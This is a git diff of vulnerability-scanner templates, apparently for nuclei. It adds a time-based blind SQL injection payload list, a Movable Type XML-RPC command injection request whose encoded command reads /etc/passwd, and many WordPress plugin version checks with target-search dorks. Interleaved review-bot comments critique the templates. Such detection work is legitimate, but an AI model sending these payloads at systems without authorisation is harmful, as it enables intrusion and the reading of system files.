+117180,8 @@ ./poc/wordpress/wp-terms-popup-1cce07d804e627ef58aa1266e2d0d645.yaml ./poc/wordpress/wp-terms-popup.yaml ./poc/wordpress/wp-testimonial-widget-29c6802974791f322cc3fd42a505c031.yaml +./poc/wordpress/wp-testimonial-widget-71769af2cc0004162bfc766437dc74d0.yaml +./poc/wordpress/wp-testimonial-widget-82d487f0b8fd6103c1335305b84fab11.yaml ./poc/wordpress/wp-testimonial-widget.yaml ./poc/wordpress/wp-testimonial-with-widget-7851c267c5129958224bd7b0d064e1e0.yaml ./poc/wordpress/wp-testimonial-with-widget.yaml @@ -117159,6 +117251,7 @@ ./poc/wordpress/wp-todo-373706a9820bd82046ddaa5eeff2947c.yaml ./poc/wordpress/wp-todo-5d069e25b5a6761ea751204d9f5b6048.yaml ./poc/wordpress/wp-todo-c0fc1554d83ed2b9e576dd46621a84ca.yaml +./poc/wordpress/wp-todo-d321c83fc92b177a4feede0546be070b.yaml ./poc/wordpress/wp-todo-e44bda3693a81f3f18131b340bc4f678.yaml ./poc/wordpress/wp-todo-e6681fd7518c30d2f63e3e203e24e33f.yaml ./poc/wordpress/wp-todo-f733a9daca6b1314d02c4c4685344788.yaml 
diff --git a/poc/auth/BlindSQLAuth.yaml b/poc/auth/BlindSQLAuth.yaml
index ce5d86554b..6fd8c3c79a 100644
--- a/poc/auth/BlindSQLAuth.yaml
+++ b/poc/auth/BlindSQLAuth.yaml
@@ -1,33 +1,33 @@ -id: time-based-sqli -info: - name: Time-Based Blind SQL Injection - author: KhukuriRimal - severity: Critical - description: Detects time-based blind SQL injection vulnerability -http: - - method: GET - path: - - "{{BaseURL}}" - payloads: - injection: - - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)" - - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z" - - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--" - - "if(now()=sysdate(),SLEEP(7),0)" - - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z" - - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z" - - "XOR(if(now()=sysdate(),sleep(7),0))XOR" - - "1%20AND%201337%3d(SELECT%201337%20FROM%20PG_SLEEP(7))--%201337" - fuzzing: - - part: query - type: replace - mode: single - fuzz: - - "{{injection}}" - stop-at-first-match: true - matchers: - - type: dsl - dsl: - - "status_code == 200" - - "duration>=7 && duration <=16" - condition: and \ No newline at end of file +id: time-based-sqli +info: + name: Time-Based Blind SQL Injection + author: Coffinxp/lostsec + severity: Critical + description: Detects time-based blind SQL injection vulnerability +http: + - method: GET + path: + - "{{BaseURL}}" + payloads: + injection: + - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)" + - "'%2b(select*from(select(sleep(7)))a)%2b'" + - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z" + - "'XOR(if((select now()=sysdate()),sleep(7),0))XOR'Z" + - "X'XOR(if(now()=sysdate(),/**/sleep(7)/**/,0))XOR'X" + - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--" + - "X'XOR(if(now()=sysdate(),(sleep((((7))))),0))XOR'X" + - "if(now()=sysdate(),SLEEP(7),0)" + - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z" + - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z" + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{injection}}" + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - "duration>=7 && duration <=16" 
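Review bot: The rewritten matcher block keeps only the duration check and drops both `status_code == 200` and `condition: and`, so any response that happens to take 7–16 seconds — a timing-out backend, a 5xx from an overloaded host, a WAF tarpit — now counts as a positive. Re-adding `- "status_code == 200"` under `dsl:` together with `condition: and` restores the gate the previous revision had; comparing against an un-injected baseline request would be stronger still, but is beyond what the template does today. The `author:` line replaces the previous contributor rather than appending to it; if the payload list was extended by a second author, listing both preserves attribution. YAML indentation is lost in this rendering, so exact line placement is inferred.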
diff --git "a/poc/cve/CVE-2021\342\200\22320837.yaml" "b/poc/cve/CVE-2021\342\200\22320837.yaml" index d9fa45c868..ab208a01bc 100644 --- "a/poc/cve/CVE-2021\342\200\22320837.yaml" +++ "b/poc/cve/CVE-2021\342\200\22320837.yaml" @@ -1,23 +1,42 @@ id: CVE-2021-20837 info: - name: RCE in MovableType - author: zin_min_phyo - severity: critical - reference: https://nemesis.sh/posts/movable-type-0day/ - tags: MovableType,RCE + name: Movable Type XMLRPC API vulnerable to OS command injection + author: Min Won + description: Movable Type 7 r.5002 and earlier (Movable Type 7 Series), Movable Type 6.8.2 and earlier (Movable Type 6 Series), Movable Type Advanced 7 r.5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8.2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors. Note that all versions of Movable Type 4.0 or later including unsupported (End-of-Life, EOL) versions are also affected by this vulnerability. Crd --> Orginal Researcher.. + reference: https://nvd.nist.gov/vuln/detail/CVE-2021-20837 + severity: high + tags: cve,cve2021,rce requests: - - method: POST - path: - - "{{BaseURL}}/cgi-bin/mt/mt-xmlrpc.cgi" + - raw: + - | + POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1 + Host: {{Hostname}} + User-Agent: POC + Accept: */* + Content-Length: 198 + Connection: close + Content-Type: text/xml + + + + mt.handler_to_coderef + + + + + YGNhdCAvZXRjL3Bhc3N3ZGA= + + + + + - body: 'mt.handler_to_coderefYGNhdCAvZXRjL3Bhc3N3ZGA=' - - - + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" part: body + diff --git a/poc/cve/CVE-2022-2440-d3549549b7d1d1f9c5181225b19ec097.yaml b/poc/cve/CVE-2022-2440-d3549549b7d1d1f9c5181225b19ec097.yaml new file mode 100644 index 0000000000..93b0c70b18 --- /dev/null +++ b/poc/cve/CVE-2022-2440-d3549549b7d1d1f9c5181225b19ec097.yaml 
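Review bot: The raw request hard-codes `Content-Length: 198` while the body is a multi-line XML block whose exact byte length is not visible here; nuclei normally recomputes Content-Length for raw requests, so the header is at best redundant and, where it is honoured, a mismatch would truncate or stall the request — drop the line and let the engine compute it. The template also keeps the legacy `requests:` key while every other template in this commit uses `http:`; switching keeps the repository consistent. Severity drops from `critical` to `high` without a `classification:` block (`cvss-metrics`/`cvss-score`) to justify it — add one from the NVD entry so the two agree. The trailing `Crd --> Orginal Researcher..` fragment reads as a credit note for the write-up URL that was removed from `reference:`; restoring that URL there keeps the attribution and fixes the typo. The XML body appears tag-stripped in this rendering, so its structure cannot be reviewed from here.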
@@ -0,0 +1,59 @@ +id: CVE-2022-2440-d3549549b7d1d1f9c5181225b19ec097 + +info: + name: > + Theme Editor <= 2.8 - Authenticated (Admin+) PHAR Deserialization + author: topscoder + severity: low + description: > + The Theme Editor plugin for WordPress is vulnerable to deserialization of untrusted input via the 'images_array' parameter in versions up to, and including 2.8. This makes it possible for authenticated attackers with administrative privileges to call files using a PHAR wrapper that will deserialize and call arbitrary PHP Objects that can be used to perform a variety of malicious actions granted a POP chain is also present. It also requires that the attacker is successful in uploading a file with the serialized payload. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/88fe46bf-8e85-4550-92ad-bdd426e5a745?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-2440 + metadata: + fofa-query: "wp-content/plugins/theme-editor/" + google-query: inurl:"/wp-content/plugins/theme-editor/" + shodan-query: 'vuln:CVE-2022-2440' + tags: cve,wordpress,wp-plugin,theme-editor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/theme-editor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "theme-editor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8') \ No newline at end of file 
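Review bot: `severity: low` disagrees with the template's own `cvss-score: 7.2` (CVSS v3.1 rates 7.0–8.9 as High); the same mismatch appears in the CVE-2024-1056 and CVE-2024-1384 templates (6.4, tagged low) and in CVE-2024-3282 (4.4, tagged low), whereas CVE-2022-46858 and CVE-2024-2541 are consistent. Either align `severity:` and the trailing `tags:` entry with the score, or state the reason in `description:`, e.g. `Severity is set below the CVSS score because exploitation requires administrator credentials and a separately uploaded file.`. Independently, the matchers only read `Stable tag` from readme.txt, so a hit means "a version in the affected range is installed", not a confirmed vulnerable endpoint; a sentence such as `Detection is version-based via readme.txt and may be stale; verify the installed version before reporting.` in `description:` would set expectations for consumers of the results.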
diff --git a/poc/cve/CVE-2022-46858-0447202dcc657f8b5ce7f72ec5cf2c5e.yaml b/poc/cve/CVE-2022-46858-0447202dcc657f8b5ce7f72ec5cf2c5e.yaml
new file mode 100644
index 0000000000..26061f62b7
--- /dev/null
+++ b/poc/cve/CVE-2022-46858-0447202dcc657f8b5ce7f72ec5cf2c5e.yaml
@@ -0,0 +1,59 @@ +id: CVE-2022-46858-0447202dcc657f8b5ce7f72ec5cf2c5e + +info: + name: > + Product Specifications for Woocommerce <= 0.6.0 - Reflected Cross-Site Scripting via Arbitrary Query String Parameter + author: topscoder + severity: medium + description: > + The Product Specifications for Woocommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the arbitrary query string parameters in versions up to, and including, 0.6.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/916d4f2f-769b-4902-9464-f55d8f64c9d2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-46858 + metadata: + fofa-query: "wp-content/plugins/product-specifications/" + google-query: inurl:"/wp-content/plugins/product-specifications/" + shodan-query: 'vuln:CVE-2022-46858' + tags: cve,wordpress,wp-plugin,product-specifications,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/product-specifications/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "product-specifications" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.6.0') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-1056-67c2890890023e1dcaf3fcf02b7286ad.yaml b/poc/cve/CVE-2024-1056-67c2890890023e1dcaf3fcf02b7286ad.yaml
new file mode 100644
index 0000000000..8810530518
--- /dev/null
+++ b/poc/cve/CVE-2024-1056-67c2890890023e1dcaf3fcf02b7286ad.yaml
@@ -0,0 +1,59 @@ +id: CVE-2024-1056-67c2890890023e1dcaf3fcf02b7286ad + +info: + name: > + Funnel Kit Funnel Builder PRO <= 3.4.5 Authenticated(Contributor+) Stored Cross-Site Scripting via allow_iframe_tag_in_post + author: topscoder + severity: low + description: > + The FunnelKit Funnel Builder Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'allow_iframe_tag_in_post' function which uses the 'wp_kses_allowed_html' filter to globally allow script and iframe tags in posts in all versions up to, and including, 3.4.5. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2fbacaf2-0b3e-4d1e-adc3-c501a6c4c816?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-1056 + metadata: + fofa-query: "wp-content/plugins/funnel-builder-pro/" + google-query: inurl:"/wp-content/plugins/funnel-builder-pro/" + shodan-query: 'vuln:CVE-2024-1056' + tags: cve,wordpress,wp-plugin,funnel-builder-pro,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/funnel-builder-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "funnel-builder-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.4.5') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-1384-a9a20a9963188caf2d7ca5d11ff8354e.yaml b/poc/cve/CVE-2024-1384-a9a20a9963188caf2d7ca5d11ff8354e.yaml
new file mode 100644
index 0000000000..37a964a542
--- /dev/null
+++ b/poc/cve/CVE-2024-1384-a9a20a9963188caf2d7ca5d11ff8354e.yaml
@@ -0,0 +1,59 @@ +id: CVE-2024-1384-a9a20a9963188caf2d7ca5d11ff8354e + +info: + name: > + Premium Portfolio Features for Phlox theme <= 2.3.3 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Premium Portfolio Features for Phlox theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'aux_recent_portfolios_grid' shortcode in all versions up to, and including, 2.3.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4475cbd4-07cf-499a-a11a-b63eb9184568?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-1384 + metadata: + fofa-query: "wp-content/plugins/auxin-portfolio/" + google-query: inurl:"/wp-content/plugins/auxin-portfolio/" + shodan-query: 'vuln:CVE-2024-1384' + tags: cve,wordpress,wp-plugin,auxin-portfolio,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/auxin-portfolio/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "auxin-portfolio" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3.3') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-2541-49857937876d85d5d1abd5bfb380cf51.yaml b/poc/cve/CVE-2024-2541-49857937876d85d5d1abd5bfb380cf51.yaml
new file mode 100644
index 0000000000..a1dae36f04
--- /dev/null
+++ b/poc/cve/CVE-2024-2541-49857937876d85d5d1abd5bfb380cf51.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-2541-49857937876d85d5d1abd5bfb380cf51
+
+info:
+ name: >
+ Popup Builder <= 4.3.3 - Sensitive Information Exposure via Imported Subscribers CSV File
+ author: topscoder
+ severity: medium
+ description: >
+ The Popup Builder plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.3 via the Subscribers Import feature. This makes it possible for unauthenticated attackers to extract sensitive data after an administrator has imported subscribers via a CSV file. This data may include the first name, last name, e-mail address, and potentially other personally identifiable information of subscribers.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/086cd6a0-adb6-4e12-b34c-630297f036f3?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-2541
+ metadata:
+ fofa-query: "wp-content/plugins/popup-builder/"
+ google-query: inurl:"/wp-content/plugins/popup-builder/"
+ shodan-query: 'vuln:CVE-2024-2541'
+ tags: cve,wordpress,wp-plugin,popup-builder,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/popup-builder/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "popup-builder"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.3.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-3282-c2b556dd2eaeb747bc64cf55c4abafd6.yaml b/poc/cve/CVE-2024-3282-c2b556dd2eaeb747bc64cf55c4abafd6.yaml
new file mode 100644
index 0000000000..ecb62a19ce
--- /dev/null
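Review bot: The two entries under `extractors:` are byte-identical apart from `internal: true` on the first, so the same regex runs twice over the same body and both write the `version` variable. If, as I believe, a named non-internal extractor also exposes its value to the `dsl` matcher, the internal copy is redundant and can be dropped; if both are genuinely needed, a one-line comment such as `# internal copy feeds compare_versions; the second surfaces the version in output` would spare the next reader the same question. Every template in this commit shares this layout, so whichever way it is resolved should be applied across the set.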
+++ b/poc/cve/CVE-2024-3282-c2b556dd2eaeb747bc64cf55c4abafd6.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-3282-c2b556dd2eaeb747bc64cf55c4abafd6
+
+info:
+ name: >
+ WP Table Builder <= 1.5.0 - Authenticated (Admin+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The WP Table Builder – WordPress Table Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f41b8d18-4a20-4b99-b375-3fafb41030ee?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 4.4
+ cve-id: CVE-2024-3282
+ metadata:
+ fofa-query: "wp-content/plugins/wp-table-builder/"
+ google-query: inurl:"/wp-content/plugins/wp-table-builder/"
+ shodan-query: 'vuln:CVE-2024-3282'
+ tags: cve,wordpress,wp-plugin,wp-table-builder,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-table-builder/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-table-builder"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.5.0')
\ No newline at end of file
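Review bot: The `version` regex `([0-9.]+)` only captures a numeric stable tag, so a readme.txt that declares `Stable tag: trunk` (a value WordPress.org plugin readmes can legitimately carry) leaves `version` unset, the `compare_versions` matcher cannot evaluate, and the template reports nothing even though the plugin is present with an unknown version. That silent miss is worth documenting in `description:`, or covering with a second matcher that reports presence when the stable tag is non-numeric. The same regex and matcher structure is used by every template in this commit.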
diff --git a/poc/cve/CVE-2024-3679-027fedcab741a41badcd943e1f2670dd.yaml b/poc/cve/CVE-2024-3679-027fedcab741a41badcd943e1f2670dd.yaml
new file mode 100644
index 0000000000..5395efa449
--- /dev/null
+++ b/poc/cve/CVE-2024-3679-027fedcab741a41badcd943e1f2670dd.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-3679-027fedcab741a41badcd943e1f2670dd
+
+info:
+ name: >
+ Premium SEO Pack – WP SEO Plugin <= 1.6.001 - Unauthenticated Information Exposure
+ author: topscoder
+ severity: medium
+ description: >
+ The Premium SEO Pack – WP SEO Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.6.001. This makes it possible for unauthenticated attackers to view limited information from password protected posts through the social meta data.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ccb65de5-bfb5-47db-87c9-ad46e65924b8?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-3679
+ metadata:
+ fofa-query: "wp-content/plugins/premium-seo-pack/"
+ google-query: inurl:"/wp-content/plugins/premium-seo-pack/"
+ shodan-query: 'vuln:CVE-2024-3679'
+ tags: cve,wordpress,wp-plugin,premium-seo-pack,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/premium-seo-pack/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "premium-seo-pack"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.6.001')
\ No newline at end of file
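Review bot: The `word` matcher requires the literal slug `premium-seo-pack` to appear in the readme.txt body, but the request path already pins that slug, and a plugin readme does not necessarily mention its own directory name, so a genuine readme with a numeric stable tag can fail the `and` condition and go unreported. If the matcher is there to reject soft-404 pages that return 200, a sentinel every readme carries, e.g. `words: - "Stable tag:"`, does that job without depending on the author having written the slug into the text. I have not checked this plugin's readme, so confirm before changing; the same pattern appears in every template in the commit.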
diff --git a/poc/cve/CVE-2024-37540-41966b5363ceb49c1002bf890479040a.yaml b/poc/cve/CVE-2024-37540-41966b5363ceb49c1002bf890479040a.yaml
new file mode 100644
index 0000000000..c21d49b695
--- /dev/null
+++ b/poc/cve/CVE-2024-37540-41966b5363ceb49c1002bf890479040a.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-37540-41966b5363ceb49c1002bf890479040a
+
+info:
+ name: >
+ Leaky Paywall <= 4.21.2 - Cross-Site Request Forgery
+ author: topscoder
+ severity: medium
+ description: >
+ The Leaky Paywall plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.21.2. This is due to missing or incorrect nonce validation on the process_level_deleted function. This makes it possible for unauthenticated attackers to modify plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3fc94760-d64b-48e1-b2bd-40cedcf48340?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-37540
+ metadata:
+ fofa-query: "wp-content/plugins/leaky-paywall/"
+ google-query: inurl:"/wp-content/plugins/leaky-paywall/"
+ shodan-query: 'vuln:CVE-2024-37540'
+ tags: cve,wordpress,wp-plugin,leaky-paywall,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/leaky-paywall/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "leaky-paywall"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.21.2')
\ No newline at end of file
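Review bot: Nothing in `info:` says that this template is a version fingerprint — it only fetches `readme.txt` and compares the stable tag — rather than a check of the nonce gap on `process_level_deleted` that the description discusses, so a hit means "installed version within the affected range", not "CSRF confirmed", and a deactivated plugin whose files remain on disk would presumably still match. A sentence in `description:` stating that, plus a `remediation:` line naming the fixed release from the referenced advisory, would make the result actionable for whoever triages the scan. The same framing is missing from every template in the commit.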
diff --git a/poc/cve/CVE-2024-37921-32c9b35565d965fce9f085fa275f2788.yaml b/poc/cve/CVE-2024-37921-32c9b35565d965fce9f085fa275f2788.yaml
new file mode 100644
index 0000000000..250b41420f
--- /dev/null
+++ b/poc/cve/CVE-2024-37921-32c9b35565d965fce9f085fa275f2788.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-37921-32c9b35565d965fce9f085fa275f2788
+
+info:
+ name: >
+ Chained Quiz <= 1.3.2.8 - Missing Authorization
+ author: topscoder
+ severity: high
+ description: >
+ The Chained Quiz plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the finalize() function in all versions up to, and including, 1.3.2.8. This makes it possible for unauthenticated attackers to answer quizzes that require logging in.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/69bc3b17-87fd-4e69-b769-85bbf13b214e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-37921
+ metadata:
+ fofa-query: "wp-content/plugins/chained-quiz/"
+ google-query: inurl:"/wp-content/plugins/chained-quiz/"
+ shodan-query: 'vuln:CVE-2024-37921'
+ tags: cve,wordpress,wp-plugin,chained-quiz,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/chained-quiz/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "chained-quiz"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.2.8')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-3944-1cac4b0f9145e2f8f8e951e09918d457.yaml b/poc/cve/CVE-2024-3944-1cac4b0f9145e2f8f8e951e09918d457.yaml
new file mode 100644
index 0000000000..c010530364
--- /dev/null
+++ b/poc/cve/CVE-2024-3944-1cac4b0f9145e2f8f8e951e09918d457.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-3944-1cac4b0f9145e2f8f8e951e09918d457
+
+info:
+ name: >
+ WP To Do <= 1.3.0 - Authenticated (Admin+) Stored Cross-Site Scripting via Task Comments
+ author: topscoder
+ severity: low
+ description: >
+ The WP To Do plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Comment in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b36b9b8a-41b0-4b57-92c7-5acebe2b0bae?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 4.4
+ cve-id: CVE-2024-3944
+ metadata:
+ fofa-query: "wp-content/plugins/wp-todo/"
+ google-query: inurl:"/wp-content/plugins/wp-todo/"
+ shodan-query: 'vuln:CVE-2024-3944'
+ tags: cve,wordpress,wp-plugin,wp-todo,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-todo/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-todo"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-39638-69edc4c284df671b2ba465627be06431.yaml b/poc/cve/CVE-2024-39638-69edc4c284df671b2ba465627be06431.yaml
new file mode 100644
index 0000000000..cc62b93394
